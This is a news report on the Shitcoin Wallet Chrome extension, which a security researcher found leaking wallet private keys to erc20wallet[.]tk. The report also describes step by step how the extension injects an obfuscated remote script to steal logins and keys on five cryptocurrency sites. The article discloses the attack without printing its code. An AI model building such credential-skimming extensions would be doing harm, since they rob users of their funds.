This extension which was launched on December 9 lets users manage Ether (ETH) coins and also Ethereum ERC20-based tokens — tokens usually issued for ICOs (initial coin offerings).
The users can install the Chrome extension and manage ETH coins and ERC20 tokens from within their browser. They can also install a Windows desktop app, if they wish to manage their funds from outside the browser.
But the Shitcoin wallet app was not doing what it was supposed to be doing. Harry Denley, Director of Security at the MyCrypto platform, found that the extension contained malicious code.
According to him, the extension is dangerous to users in two ways. First one is that any funds (ETH coins and ERC0-based tokens) managed directly inside the extension are at risk.
The extension sends the private keys of all wallets created or managed through its interface to a third-party website located at erc20wallet[.]tk.
On analysis of the malicious code, the process takes place as
- Users install the Chrome extension
- When users navigate to any of these 77 sites, the extension loads and injects an additional JS file from: https://erc20wallet[.]tk/js/content_.js
- This JS file contains obfuscated code
- The code activates on five websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange
- After activating the malicious JS code records the user’s login credentials, searches for private keys stored inside the dashboards of the five services, and, eventually sends the data to erc20wallet[.]tk
It is however not clear whether the Shitcoin Wallet team is responsible for the malicious code, or if the Chrome extension was compromised by a third-party.
On the extension’s official website, 32-bit and 64-bit installers were also made available to users. On scanning with VirusTotal, both the files are found to be clean.
But according to various comments posted on the wallet’s Telegram channel, the desktop apps might contain similar malicious code, if not worse.